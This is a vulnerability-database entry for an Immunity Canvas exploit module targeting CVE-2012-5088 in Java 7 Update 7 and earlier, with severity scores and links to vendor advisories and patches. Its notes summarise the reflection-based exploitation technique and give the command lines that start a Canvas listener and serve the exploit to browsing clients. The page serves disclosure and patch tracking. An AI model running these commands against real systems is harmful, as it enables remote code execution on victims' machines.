Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
canvasImmunity CanvasJAVA_CVE_2012_5088
HistoryOct 16, 2012 - 9:55 p.m.

Immunity Canvas: JAVA_CVE_2012_5088

2012-10-1621:55:00
Immunity Canvas
exploitlist.immunityinc.com
18

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.927 High

EPSS

Percentile

98.8%

JSON
Name java_CVE_2012_5088
CVE CVE-2012-5088 Exploit Pack
VENDOR: Sun
Notes:
The exploitation technique is abusing bug patched in CVE-2012-5088 which is allowing to use reflection with full privileges. This is due to the fact that
we are getting an instance of java.lang.invoke.MethodHandles.Lookup by calling the static method java.lang.invoke.MethodHandles.lookup() using the
AverageRangeStatisticImpl class which is part of the JDK so the lookup object has a “trusted” immediate caller giving us full privileges
Then we make use of the AnonymousClassLoader technique to fully exploit the target.

Affected versions
JDK and JRE 7 Update 7 and earlier

Tested on:
- Windows 7 with JDK/JRE 7 update 7
- Ubuntu 11.10 with JDK/JRE 7 update 7
- Ubuntu 11.10 with JDK/JRE 7 update 6

To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_CVE_2012_5088 -O allowed_recon_modules:js_recon -O auto_detect_exploits:0

Repeatability: Infinite (client side - no crash)
References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5088
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5088
http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html
Date public: 16/10/2012

Related

metasploit 1
checkpoint_advisories 1
packetstorm 1
ubuntucve 1
zdt 1
seebug 1
prion 1
cve 1
exploitdb 1
openvas 13
ibm 3
suse 3
nessus 15
oraclelinux 1
redhat 3
centos 1
ubuntu 1
securityvulns 1
gentoo 1
metasploit
metasploit
Java Applet Method Handle Remote Code Execution
2013-01-17 20:14:49
checkpoint_advisories
checkpoint_advisories
Java Applet Method Handle Remote Code Execution (CVE-2012-5088)
2016-11-28 00:00:00
packetstorm
packetstorm
Java Applet Method Handle Remote Code Execution
2013-01-23 00:00:00
ubuntucve
ubuntucve
CVE-2012-5088
2012-10-16 00:00:00
zdt
zdt
Java Applet Method Handle Remote Code Execution Vulnerability
2013-01-23 00:00:00
seebug
seebug
Java Applet Method Handle Remote Code Execution
2014-07-01 00:00:00
prion
prion
Design/Logic Flaw
2012-10-16 21:55:00
cve
cve
CVE-2012-5088
2012-10-16 21:55:00
exploitdb
exploitdb
Java Applet - Method Handle Remote Code Execution (Metasploit)
2013-01-24 00:00:00
openvas
openvas
Oracle Java SE JRE Multiple Unspecified Vulnerabilities-03 oct12 (Windows)
2012-10-19 00:00:00
Oracle Java SE JRE Multiple Unspecified Vulnerabilities - 03 - (Oct 2012) - Windows
2012-10-19 00:00:00
SUSE: Security Advisory (SUSE-SU-2012:1489-2)
2021-06-09 00:00:00
ibm
ibm
Security Bulletin: IBM Rational Build Forge Java (CVE-2012-3216, CVE-2012-5077, CVE-2012-5073, CVE-2012-5074, CVE-2012-5083, CVE-2012-5072, CVE-2012-1531, CVE-2012-5081, CVE-2012-5069, CVE-2012-5079, CVE-2012-5088)
2018-06-17 04:45:18
Security Bulletin: Vulnerabilities in Rational Functional Tester versions 8.x due to security vulnerabilities in IBM JRE 7.0 Service Release 2 or earlier, and non-IBM Java 7.0
2019-05-07 13:40:01
Security Bulletin: IBM Operational Decision Manager and WebSphere ILOG JRules: Multiple security vulnerabilities in IBM JRE 6.0
2022-09-25 23:13:40
suse
suse
Security update for IBM Java 1.7.0 (important)
2012-11-21 18:08:45
java-1_7_0-openjdk: Update to icedtea-2.3.3 (important)
2012-10-31 16:11:24
Security update for OpenJDK (important)
2012-10-24 22:08:57
nessus
nessus
Scientific Linux Security Update : java-1.7.0-openjdk on SL6.x i386/x86_64 (20121017) (ROBOT)
2012-10-22 00:00:00
Oracle Linux 6 : java-1.7.0-openjdk (ELSA-2012-1386) (ROBOT)
2013-07-12 00:00:00
openSUSE Security Update : java-1_7_0-openjdk (openSUSE-SU-2012:1419-1) (ROBOT)
2014-06-13 00:00:00
oraclelinux
oraclelinux
java-1.7.0-openjdk security update
2012-10-17 00:00:00
redhat
redhat
(RHSA-2012:1386) Important: java-1.7.0-openjdk security update
2012-10-17 00:00:00
(RHSA-2012:1391) Critical: java-1.7.0-oracle security update
2012-10-18 00:00:00
(RHSA-2012:1467) Critical: java-1.7.0-ibm security update
2012-11-15 00:00:00
centos
centos
java security update
2012-10-17 21:16:08
ubuntu
ubuntu
OpenJDK vulnerabilities
2012-10-26 00:00:00
securityvulns
securityvulns
Oracle Java / OpenJDK multiple security vulnerabilities
2012-10-30 00:00:00
gentoo
gentoo
Oracle JRE/JDK: Multiple vulnerabilities
2014-01-27 00:00:00

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.927 High

EPSS

Percentile

98.8%

JSON
Related for JAVA_CVE_2012_5088
metasploit1checkpoint_advisories1packetstorm1ubuntucve1zdt1seebug1prion1cve1exploitdb1openvas13ibm3suse3nessus15oraclelinux1redhat3centos1ubuntu1securityvulns1gentoo1